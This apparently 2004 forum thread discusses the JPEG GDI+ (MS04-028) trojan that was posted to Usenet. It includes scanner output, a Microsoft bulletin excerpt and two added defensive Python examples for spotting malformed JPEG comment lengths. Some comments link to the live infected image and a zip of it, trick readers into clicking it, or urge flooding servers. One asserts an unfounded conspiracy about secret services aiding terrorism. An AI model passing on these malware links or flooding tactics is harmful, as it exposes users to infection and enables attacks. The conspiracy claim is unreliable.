First JPEG Virus Posted To Usenet
Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."
I want to see what GraphicConverter does with this.
One more reason not to look at that goatse picture!
Usenet posts JPEG viruses to you!
Congrats, microsoft, for making just about every filetype unsafe.
The worst part is that you don't even need to be using IE. Hopefully mozilla decodes the jpgs itself before rendering them on windows.
autopr0n is like, down and stuff.
Hopefully not too many people get hit by this...
Meanwhile, I'm just happy I don't run windows at home!!
This exploit could also be used by inserting the code into certain applications that render JPEG images while running. Also, email worms that have JPEG images attached with the code could cause mass havoc. Glad I'm on OS X!
gShares.net
-------
artlu.net
Here we go again... Hold on... woooooowww. :)
I hope I'm safe enough by not using many Microsoft apps, but I'm not sure about that. Sucks.
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Update your systems now! The patch has been out for several weeks. I have already applied it to my corporation via SUS (which is free) and am rolling out the office patch now, as well. There is no reason other than laziness or sysadmin ignorance for this to be another massive virus attack.
This sort of thing ushers in a new era of exploitation in which the warnings of security professionals in the past have been proven dreadfully wrong. Only the bearded terminal hackers are invulnerable to this one, typing away at their command lines being all, "What JPGS?". No longer can we simply give advice on security based on our assumptions as to what is possible and what is not. We must pay the piper and actually consider attack vectors that have formerly not been feasible.
I wish Snort had intrusion prevention capability. = wink wink=
Does this affect Firefox?
It was only a matter of time. Now we wait for a dozen variants to pop up.
"This could possibly be the worst viruses yet!"
Hm...maybe when he started typing there was only one and it spread during the sentence?
GOD SAVE THE PR0N :)
I guess those nude pictures of Anna Kournikova could indeed be a virus.
Virus writers should be dragged out in the street and... well, whatever.
The only reason we need security for this crap is because the viruses exist. Which means that we only have security when the need arises. If the vulnerability exists but is never exploited, it tends to sit open and unpatched. As soon as this pops up, we see vendors frantically patching systems.
I usually call it like I see it - which means defending the bad guys when they deserve it. But in this case, there's no doubt that open source has major advantages. The vulnerability has been identified, people are complaining that it's not being fixed... I bet it takes a virus to get MS (and others) moving to fix it.
What browsers are protected from the jpeg virus? I remember IE and some earlier versions of Mozilla being said to be vulnerable to this. This could be my incentive to upgrade Firedragon, or whatever they call it these days.
We all live in a #FFFF00 submarine...
If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.
Interested in open source engine management for your Subaru?
clamscan possibleVirus.jpg
possibleVirus.jpg: Exploit.JPEG.Comment FOUND
----------- SCAN SUMMARY -----------
Known viruses: 24607
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
I/O buffer size: 131072 bytes
Time: 0.501 sec (0 m 0 s)
also updated NAV Corp 8 with the latest defs (9/27/04) and it found it. AVG Free Edition doesn't as of yet.
Lawyers, MBA's, RIAA? A jedi fears not these things!
your neighbor's open access point, a copy of Airpwn and a suitably infected JPEG. Sounds like a pretty nasty situation in the making to me.
www.linux-skunkworks.com
No Screenshots, please!
Tell the truth and you won't have so much to remember.
No, just a backdoor.
Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.
These could be the worst grammar too!!!
If you read through the actual posting, it is apparent that while this may be the first GDI/JPEG-based worm, it is certainly not going to be the worst. First of all, unless I missed it, this code does not even self-replicate (i.e. it doesn't mail itself to others, or post itself to Usenet, or otherwise exploit vulnerable systems). I would expect to see some script kiddies combine this proof-of-concept trojan with some social-engineering-type email worms, and then **THAT** will be a nasty worm.
yes, if you haven't updated to the latest version.
See this Slashdot thread.
- Leo
You don't use science to show that you're right, you use science to become right.
put the image on doubleclick.net
Real Player and that piece of crap spyware that Dell calls a media player just blithely tried to open the file without performing any integrity checks whatsoever, and damn near crashed the system.
I bet this sort of thing is a helluva lot more endemic than people realize.
If you are using Windoze, run ZoneAlarm from ZoneLabs ;^). Every program that tries to access the internet in any way has to pass through this program and be okayed by you! Just click DENY and REMEMBER THIS SETTING. The software will still be installed but it can't get back to the LOSER who released it!
apparently, the text indicates, that's the only source for the installed files.
if say, 500 of us were to log into that and stay connected, would we stop the virus? would there be any risk to ourselves? (giving your IP away for a start).
This is my Sig, this is my Gun. One is for Slashdot and one is for Fun.
Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing plenty of guys asking for help getting this removed, after finding out pornstars aren't virus free after all.
Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with Blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket licence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from building to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.
Now i can go exploiting people! Thx for the virus easynews! http://easynews.com/virus/virus-jpeg.zip
There's no Freedom like UFP-dom
Come on... admit it, you've all been dying for this Slashdot posting. You didn't think all this hype about the Microsoft GDI thing wasn't going to pay off? Well there you go.... feast on Microsoft's pain....
Anyone know if this exploit can be done when the user is using a Windows Limited account?
I don't see any indication that it's a virus at all. Just that the jpeg installs remote admin tools, connects to IRC and other typical things.
How does it propagate?
FYI, here's the fix from M$ for this exploit: Security Bulletin
It is very hard to get in right now. I've set FlashFXP to retry 1,000 times every 15 seconds. We'll see how that goes.
The more of us that keep this connection tied up doing innocent things for the next 48 hours, the better.
There really needs to be a distributed DDOS for spammer sites, virus sites, etc. Use The Force for good, I say.
Lose Weight and Feel Great with Isagenix
Can somebody explain how this affects me? How can a picture be a virus? It looks like Notepad opening readme.txt and formatting your hard drive. And what viewers and browsers can do it? If I save it and double-click from the desktop explorer? Is it a picture or a viewer problem? If I use an old version of a browser or the 95 OS will it still create problems? If I use a firewall like ZA will that stop it? Anytime I see these virus problems I never know. Of course whenever I do check my comp for problems with both an AV and spyware blocker it finds nothing. Of course I don't download willy-nilly.
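The short answer to "how can a picture be a virus" is that the picture is not executed, the parser is. MS04-028 is a bug in how GDI+ reads the 2-byte length field of a JPEG comment (COM) segment: the field counts its own two bytes, the decoder subtracted 2 to get the payload size, and a declared length of 0 or 1 wrapped that subtraction around to a huge unsigned value, so the copy that followed overran a heap buffer. The following is an added illustration by the editor, not code from the Easynews write-up or from the posted file: a minimal JPEG marker walker that flags exactly that condition. The sample bytes at the bottom are constructed for the example.

```python
# Added illustration (editor's code, not from the Easynews write-up or the
# posted exploit): walk a JPEG's marker segments and flag the malformed COM
# segment that triggers the MS04-028 GDI+ bug.
import struct
from typing import List, Tuple

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: TEM, RST0..RST7, SOI, EOI.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))


def scan_jpeg(data: bytes) -> List[Tuple[int, str]]:
    """Walk the header segments of a JPEG and return (offset, problem) pairs.

    An empty list means every segment before the image data has a sane
    length. Scanning stops at SOS because entropy-coded data follows it.
    """
    findings: List[Tuple[int, str]] = []
    if data[:2] != b"\xff\xd8":
        return [(0, "not a JPEG: missing SOI marker")]
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            findings.append((pos, "expected 0xFF marker prefix, got 0x%02X" % data[pos]))
            break
        while pos < len(data) and data[pos] == 0xFF:  # 0xFF fill bytes are legal
            pos += 1
        if pos >= len(data):
            findings.append((pos, "file ends inside a marker"))
            break
        marker, marker_off = data[pos], pos - 1
        pos += 1
        if marker == EOI:
            break
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            findings.append((marker_off, "truncated length field after marker 0x%02X" % marker))
            break
        (length,) = struct.unpack(">H", data[pos:pos + 2])
        if length < 2:
            # The 16-bit length counts its own two bytes, so 0 and 1 are
            # invalid. The GDI+ decoder computed the payload size as
            # length - 2 in an unsigned integer, so these values wrapped to
            # about 4 GB and the copy that followed overran the heap buffer.
            wrapped = (length - 2) & 0xFFFFFFFF
            name = "COM" if marker == COM else "0x%02X" % marker
            findings.append((marker_off,
                             "%s segment declares length %d; length-2 wraps to 0x%08X (MS04-028 pattern)"
                             % (name, length, wrapped)))
            break
        if pos + length > len(data):
            findings.append((marker_off, "segment 0x%02X overruns the file by %d bytes"
                             % (marker, pos + length - len(data))))
            break
        if marker == SOS:
            break
        pos += length
    return findings


def is_ms04_028_candidate(data: bytes) -> bool:
    """True if the header contains a segment whose declared length is 0 or 1."""
    return any("MS04-028" in msg for _, msg in scan_jpeg(data))


# Constructed samples, not the file from the Usenet post: a well-formed
# SOI + APP0 (JFIF) + COM + EOI header, and the same header with a COM
# segment whose declared length is 1.
JFIF_APP0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
GOOD_JPEG = b"\xff\xd8" + JFIF_APP0 + b"\xff\xfe\x00\x07hello" + b"\xff\xd9"
BAD_JPEG = b"\xff\xd8" + JFIF_APP0 + b"\xff\xfe\x00\x01" + b"\x90" * 16 + b"\xff\xd9"

if __name__ == "__main__":
    for label, blob in (("good", GOOD_JPEG), ("bad", BAD_JPEG)):
        print(label, scan_jpeg(blob) or "header segments look sane")
```

This is what a signature like ClamAV's Exploit.JPEG.Comment keys on: a structurally impossible length, not anything about the picture itself. It also answers the "which viewers" question in principle: any program that hands the file to the vulnerable gdiplus.dll copy is exposed, whatever it is called, and a firewall sees only a normal image download.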
Why can't it just nuke the hard drive like the old virii did? Teach people a little about access levels and system patching.
[Since it seems to me it might be good for us all to collect as much information as possible in this thread ...]
PS: just for the hell of it, on a box that's not using one of the allegedly vulnerable versions of Windows or IE (it's NTWS SP6a, IE5.5), I tried to open the Easynews sample image using Irfanview V3.80, which displayed the error message :
I suppose I'd better run a full scan of my peecee anyway now ... sigh ... I wonder which JPEG library Irfanview uses ...
Although the SANS website says their scanner is written for Win2K+, it seems to run on NT (although the output format is a bit screwy), and it reckoned there is one vulnerable DLL, at
Dunno where that came from, but it describes itself as "Microsoft Vector Graphics Rendering(VML)", and - fascinatingly - the copyright says "Unpublished work. Copyright© Microsoft Corporation 1983-1999. All rights reserved."
If you don't pray in my school, I won't think in your church.
Not in these parts...
Why doesn't slashdot allow you to post images! :)
Does this mean all those lonely college bachelors have to stop downloading porn until MS patches the hole?
Wasn't iLoveYou the worst virus ever? Or Stages? Or Melissa? Or Nimda? Or the "Good Times" virus? This one will fall into obscurity, too.
Use Evolution instead of Outlook? Bewa
Strange. Our clients, suppliers, and CEO haven't noticed any of the above effects on our $10 million turnover.
Nice try.
I remember a web page once that had HTML that was known to crash certain versions of Internet Explorer. Some kind of buffer overflow diddling via HTML couldn't be that far off. Declarative protocols can clearly be full of holes also, not just executable content.
Table-ized A.I.
Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.
What, now you can't even WATCH sex without protection?
In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.
In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.
Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?
i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.
I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the Office Update page. Guess what: the Office Update page said there were no updates. So, apparently the system is vulnerable, but there is no way to fix it. Wonderful!
The real "Libtards" are the Libertarians!
. . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .
One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
I sure hope Netfirms have good logs, and that the bastards who did it were stupid enough to set the account up directly from their own machines rather than via a compromised intermediary.
If there's no name yet, how about the Medusa virus?
So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?
Millions of instant zombies.
That's f*cking scary....
Microsoft Security Bulletin MS04-028
Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987)
Issued: September 14, 2004
Updated: September 21, 2004
Version: 1.2
Summary
Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components.
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Critical
Recommendation: Customers should apply the update immediately.
Security Update Replacement: None
Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information.
Tested Software and Security Update Download Locations:
Affected Software:
Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987)
Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987)
Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987)
Microsoft Windows Server(TM) 2003 - Download the update (KB833987)
Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987)
Microsoft Office XP Service Pack 3 - Download the update (KB832332)
Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332)
Microsoft Office XP Software:
Outlook® 2002
Word 2002
Excel 2002
PowerPoint® 2002
FrontPage® 2002
Publisher 2002
Access 2002
Microsoft Office 2003 Software:
Outlook® 2003
Word 2003
Excel 2003
PowerPoint® 2003
FrontPage® 2003
Publisher 2003
Access 2003
InfoPath(TM) 2003
OneNote(TM) 2003
Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931)
Microsoft Project 2003 (all versions) - Download the update (KB838344)
Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932)
Microsoft Visio 2003 (all versions) - Download the update (KB838345)
Microsoft Visual Studio .NET 2002 - Download the update (KB830348)
Microsoft Visual Studio .NET 2002 Software:
Visual Basic .NET Standard 2002
Visual C# .NET Standard 2002
Visual C++ .NET Standard 2002
Microsoft Visual Studio .NET 2003 - Download the update (KB830348)
Microsoft Visual Studio .NET 2003 Software:
Visual Basic .NET Standard 2003
Visual C# .NET Standard 2003
Visual C++ .NET Standard 2003
Visual J# .NET Standard 2003
The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461)
Microsoft Picture It!® 2002 (all versions) - Download the update
Microsoft Greetings 2002 - Download the update
Microsoft Picture It! version 7.0 (all versions) - Download the update
Microsoft Digital Image Pro version 7.0 - Download the update
Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update
Microsoft Digital Image Pro version 9 - Download the update
Microsoft Digital Image Suite version 9 - Download the update
Microsoft Producer for Microsoft Office PowerPoint (all versions)
Microsoft Platform SDK Redistributable: GDI+ - Download the update
Office Users Note Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office
Furthermore, you would not need a firewall if you were not running services that bound to things other than localhost. Since Windows firewall (prior to SP2, not sure whether SP2 has this functionality) doesn't let you pick who gets through to your ports, users should have the choice to shut down all ports exposed to the net. Keeping ports open and firewalled to everybody seems stupidly inefficient.
It was Bug Month, not security, though that's related. It was in 2002. The shortest month, February.
... "It's time to get the garage cleaned out."
"We are not coding new code as of today for the next month," Richard Purcell, director of the Microsoft's corporate computing office
Which I thought was straight PR, and if there were any actual deferrals of project waypoints, this time would be spent dealing with personal inbox overloads.
But I did get contacted by a Microsoft engineer during that time, re a software failure I'd detailed online. {Nothing's been fixed, mind you.}
"Quality freefall"? Not really. They've always produced third tier code. This is normal. The only difference right now is they're feeling more heat about it because programs can do more, and they've got competition they can't kill in Open Source. The profitability of their poor quality of approach is falling against these two rising variables. Quality itself has been steady state.
because i see a vulnerability in it..
... someone defaces a popular website with such an image. Imagine if someone replaced the main image on the worlds most popular search engine!
Or if someone posts such an image to an automatic image rating site (are they still popular? does hotornot still exist?)
Heard way too many horror stories about SP3 and decided not to take the chance (since SP2 killed my system and required a complete reinstall). Are there any standalone patches for SP2 available?
If the g'vt kept the data on you that google does you'd better believe you'd be calling it "doing evil"
Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.
members are seeing something, you're seeing an ad
This looks like it could be the worst Windows virus to date. What is the easiest way to block this specific code from getting through a Linux NAT/firewall?
- how can I drop any packet containing a particular sequence of bytes?
- better: how would one do it at the TCP level so you catch it even if it spans more than one packet?
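The second question is the important one. A packet-level byte match (the iptables string match, for instance, inspects each packet on its own) is blind to a signature that happens to be cut by a segment boundary, and an attacker who controls the sending host can arrange that split deliberately. Catching it takes TCP stream reassembly in front of the matcher. The following is an added example written for this page, not code from any firewall product or from the thread: a per-packet matcher beside a small reassembler, run over constructed traffic. The signature bytes (a COM marker declaring length 0 or 1, which no valid JPEG produces), the sequence numbers and the payload are all assumptions made for the example.

```python
# Added illustration (editor's code, not from any firewall product or the
# original thread): why a per-packet byte-pattern rule can miss a signature
# that straddles a segment boundary, and how stream reassembly closes the gap.
import re
from typing import List, Tuple

# Assumed signature: the bytes a COM marker with a declared length of 0 or 1
# puts on the wire. Nothing in a valid JPEG produces this sequence.
SIGNATURE = re.compile(rb"\xff\xfe\x00[\x00\x01]")

Segment = Tuple[int, bytes]  # (TCP sequence number, payload)


def match_per_packet(segments: List[Segment]) -> bool:
    """What a packet-at-a-time string match sees: each payload on its own."""
    return any(SIGNATURE.search(payload) is not None for _, payload in segments)


def reassemble(segments: List[Segment], isn: int) -> bytes:
    """Rebuild the contiguous byte stream that starts at sequence number isn.

    Segments may be out of order, duplicated or overlapping. Overlaps keep
    the bytes already delivered (first wins); which copy a reassembler
    trusts is itself an evasion question, so a production IDS should follow
    the policy of the host it protects. Bytes after a hole are not returned.
    """
    stream = bytearray()
    for seq, payload in sorted(segments, key=lambda s: (s[0] - isn) & 0xFFFFFFFF):
        offset = (seq - isn) & 0xFFFFFFFF
        if offset > len(stream):
            break  # hole: a segment has not arrived yet
        already = len(stream) - offset  # overlap from a retransmit or duplicate
        stream += payload[already:]
    return bytes(stream)


def signature_offset(stream: bytes) -> int:
    """Offset of the first signature hit in a reassembled stream, or -1."""
    m = SIGNATURE.search(stream)
    return m.start() if m else -1


def match_stream(segments: List[Segment], isn: int) -> bool:
    """What a matcher fed by the reassembler sees."""
    return signature_offset(reassemble(segments, isn)) >= 0


# Constructed traffic: a JPEG header with a COM segment declaring length 1,
# cut so the 4-byte signature (offsets 20-23) straddles two segments, which
# arrive out of order.
MALFORMED_JPEG = (b"\xff\xd8"
                  + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
                  + b"\xff\xfe\x00\x01" + b"\x90" * 32)
ISN = 0x10000000
SEGMENTS: List[Segment] = [
    (ISN + 22, MALFORMED_JPEG[22:]),  # second half shows up first
    (ISN, MALFORMED_JPEG[:22]),
]

if __name__ == "__main__":
    print("per-packet match:", match_per_packet(SEGMENTS))  # False
    print("stream match:    ", match_stream(SEGMENTS, ISN))  # True
```

Two caveats a practitioner would add: a signature this short will also fire on unrelated binary traffic, so in practice it belongs inside a rule that is already looking at an image download; and reassembly only helps on a path where the inspector sees both the whole stream and the same segment-overlap policy as the victim host, otherwise the attacker simply sends two conflicting copies of the straddling bytes.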
I was talking with a friend on MSN... coincidentally after reading on this for about 2 hours. The first thing she said was very suspicious: C3ly$c3 says: you there? ...http://www.xf2s.com/msn/wode.jpg.
err a jpeg surrounded by a bunch of other characters ... sounds suspicious
I don't know if this is actually the virus.... I'm on my laptop right now which runs Windows (unpatched of course)
If it can install a service, it can disable or punch a hole into any firewall running on the client. A client firewall, IMO, is worse than nothing in that it provides a false feeling of invulnerability.
I don't know about AIM, but MSN reencodes all images to PNG. I don't think there's going to be much risk from that.
-ReK
md5sum -c reality.md5
reality: FAILED
md5sum: WARNING: 1 of 1 computed checksum did NOT match
You'd be breaking several laws in the process. So I wouldn't suggest it ;)
http://www.archive.org/details/ThePowerOfNightmares
That'll fix it...
Oh well, what the hell...
I played with the sample code to crash a machine last Friday. That code produced a 2K JPEG. (Likely it was smaller but I'll bet 2K is the block size on my 80 GB hard drive. File is at work so I can't check it now.)
7K sounds very reasonable if all it has to do is download the real executables.
Technically, this is a Trojan Horse, not a virus.
the IRC channel has been slashdotted... that's new
Sorry to be nitpicky here, but this is a trojan horse, not a virus. A virus propagates through replication.
LS
There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?
Apple really has come a long way around here, eh?
It's all pretty simple there. To install something you have to put in the admin password. Unix made easy.
The way Apple does it (by app) is FAR more intelligent than having to make a user an admin or log out of the system entirely to log in as an admin.
I have a few applications here at the school that demand admin privs. I've all but given up trying to restrict them. But as anyone who has seen the proliferation of unwanted toolbars can attest - the cost is high.
"...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
Interesting that this virus, which has been in the wings and known of by select groups for years now, should at this time be given lots of promotion, (a few virus releases and big, loud press attention like a freekin' summer movie advertising run), right when the most important US election in the history of mankind is gearing up.
Having people scared out of the public places so that they can't discuss the events which are about to unfold. . ?
And some dorks still laugh at me and say I'm a paranoid conspiracy nut.
--Goodness! Well, if conspiracies don't exist, why are there laws like, 'Conspiracy to commit _____' on the books? And who but the lying psychos in government are better suited to pulling such stunts? Only a nut would actually lower his/her guard over the next couple of months!
Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services.
Not that you'll be able to talk about it on-line, what with all the scary viruses and all!
Buckle up, kids. This stretch of road is about to get bumpy.
-FL
It will trojan zillions of systems, leaving them open for all sorts of havoc.
Right before the US presidential election, a time when terrorists worldwide are feverishly searching for a huge American backdoor. Expect DDoS against the most "important" corporate servers.
All this thanks to programmers fuckingly stupid enough to use a low-enough level language that is rife with buffer overflows and to their managers for allowing them to turn-out such sloppy products.
Hopefully this will be the straw that breaks the camel's back, and will cause massive interrogation of the "wisdom" of using Microsoft products and raise the awareness about alternatives.
Does running the apps in a non-admin account solve this problem? Only admins can install new services, right?
....it's a posting to an adult newsgroup, the kind that renders little thumbnails of nasty, farm animal love and other things that must not be mentioned here.
it has no other way of spreading. you have to be either moronically inquisitive or a seriously wacked pervert to get infected with this "virus," b/c you'd have to either click on a link taking you there (and "she-males-love-it-up-the-@$$" from alt.binaries.multimedia.erotica.transsexuals" is not a best-seller) or you must be a total sicko.
...because you never know who you're dealing with.
Bleeping Computer has a tutorial on how to use GDI Scan, offered by ISC, to find apps with the vulnerable gdiplus.dll. The tutorial can be found here:
GDI Scan Tutorial and how to fix the GDI+ JPEG Vulnerability
Either update those apps so they dont have the problem anymore, or do not use the app.
I saw a weak outgoing attempt to 209.171.43.27, but nothing came back :-(
Better roll the ol' VMware snapshot back just in case.
"I'm on my laptop right now which runs Windows (unpatched of course)" Of course? Uh, why?
...at isc.sans.org (Internet Storm Center). Do not use the one from Microsoft. It *sucks*. Watch DShield (like a hawk). Read www.cert.org. Read "comp.risks" (Usenet).
and still lose too much time..
We didn't have Clippy the paperclip in 1994...those were dark times indeed. Praise be to Microsoft, for delivering anthropomorphized office supplies unto the wretched masses!
If you're behind any kind of firewall, and I know I'm saying *if*, then Remote Admin won't do you much good for remote connections unless you've got port 4899 open. If they are using a different port mapping in the registry file then it will conflict if you have another service running on that 'standard' port. Seems pretty bad to install an app like Remote Admin for that purpose.
Why do overlook and oversee mean opposite things?
For a Windows server to run it on. Plus more for additional client access licenses. Which is fine if you've already spent that money.
For the rest of us, grab WindowsUpdate Cache. Runs on Squid, the world's most popular proxy server.
hrm being a developer who has used gdi+ before, it is not only for viewing jpegs. It does have a jpeg/gif etc viewing component to it. So just because an application uses gdiplus does not make it vulnerable. Picture viewers that depend on gdiplus (probably the built in one in winxp, word and other viewers that rely on gdiplus for jpeg viewing are vulnerable)
I'm also curious to know if this virus works on winxp sp2. Wasn't all the fuss about sp2 the NX flag to prevent executions in case of buffer overflows?
Or does this virus only target the unclean?
did you forget to take your meds?
The MSN server surely has enough bandwidth for spamming service.
or do you make the upgrade keep your settings, and keep the plugin format backwards compatible?
i hate pansy republicans
Google surely has the largest kiddie porn collection on the planet. Note the thumbnail images returned by the image search.
The workaround is to not use any programs which require graphics. Please switch to using the command prompt for all applications until a patch has been made. Edlin is the recommended editor for security minded users. Now Microsoft just needs to post documentation on how to edit microsoft word format docs via binary editing in edlin and we'll be back to normal!
MSN reencodes all images to PNG
That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Apparently some anti-virus programs catch it, but we all know that not everyone running a windows system keeps up to date spam filters. And *many* of the email programs for windows will render images, even in a preview pane. This is a huge, huge problem.
I'm sure that *this* time, MS's major customers will demand improvements! ...in other news, Moller will finally get his SkyCar to market, cold fusion will be proven true, and all the PHB's in the world will be canned and replaced by people with a clue.
-jcr
The only title of honor that a tyrant can grant is "Enemy of the State."
From www.ijg.org. This library is very popular.
And if yes, are all application linking this library subject to the vulnerability?
If yes this will be a lot of work to update all applications.
In cyberspace nobody knows you're a cat!
It's up to the educated people to inform them then, or make the system safer. I've built several varieties of Linux desktops, and for the most part the users have no idea what "root" is... as in the apps that need root access (Synaptic, apt scripts, etc) are run via sudo and everything else runs at the user level.
...that's a virus!
gone are my days of safe pr0n browsing....
unfortunately it's not quite that simple **points up**
If I recall there was an image handling vulnerability in Thunderbird 0.7.3. When that came to light I updated to 0.8. Unfortunately, 0.8 ships with a bug which means that in many cases, a basic POP3 email account can't be validated properly.
So... the current release of one of the flagship Free software projects doesn't work, but you can fix it by downgrading to an older version with a major vulnerability. Excellent!
I submitted a story on this problem to Slashdot but hey, who wants to discuss problems with Free stuff when there's always another cheap crack to make about Microsoft, eh?
they've added some value: wrote a script to pick up the first publicly available exploit by mining their massive Usenet feed. It's fair enough they should get some publicity of the "gee, these guys are switched on, they really know their Usenet" type. Props to them.
I went to a conference recently where Microsoft was explaining how to get games to behave under windows - for example don't write your save files to c:\program files and don't mess around with HKEY_LOCAL_MACHINE at runtime. There were less than ten people there, most of whom were speakers. And so I notice most games (and many other packages) require to be run with admin privileges. They still think they are writing DOS games, except with a snazzy graphics library.
I'm just wondering how long it will take the spyware/adware people to exploit this like with one of their annoying banners. Also I expect this could also be done by the spam gangs to create more new zombies for spamming.
Anyone know the exact date of release?
Someone has finally posted an exploit to Usenet.
Let me guess: the subject was "Good Times"?
sudo ergo sum
The GDI Scan tool from ISC reveals that after all of the latest patches for Windows and Office, I am still left with vulnerable .dll files within Office.
.dll dated May 2004.
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.0.0_x-ww_8d353f13\GdiPlus.dll
Version: 5.1.3097.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.10.0_x-ww_712befd8\GdiPlus.dll
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.1360_x-ww_24a2ed47\GdiPlus.dll
Further... the version of the GDI+ redistributable on the MSDN site still includes a vulnerable version of the GDI
On this fully patched Windows XP system GDI Scan reveals the following information:
Scanning Drive C:...
C:\Program Files\Common Files\Microsoft Shared\Office10\MSO.DLL
Version: 10.0.3501.0 -- Possibly vulnerable (Under OfficeXP only)
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
Version: 11.0.6360.0
C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
Version: 6.0.3264.0
C:\Program Files\Microsoft Works\GDIPLUS.DLL
Version: 5.1.3102.1360
C:\WINDOWS\$NtUninstallKB833998$\s
Version: 5.1.2600.1106 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\$NtUninstallKB839645$\sxs.d
Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\system32\dllcache\vgx.d
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\WinSxS\x86_Microsoft.Wi
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3101.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Gdi
Version: 5.1.3102.1360
Scan Complete.
What you can do now to limit the spread:
* Update all of your virus checkers and make sure that they are fully active (auto, not just on-demand).
* Disable images in your email applications, just use text only.
* Switch your primary browser to Firefox or another browser whose latest version is immune from this specific attack. If you have to still use IE, then do so only for sites you truly trust.
Just click on this link:
;-)
http://www.easynews.com/virus.jpg
[Please type your sig here.]
Mosaic always had the option to not display images. All graphical web browsers have this option.
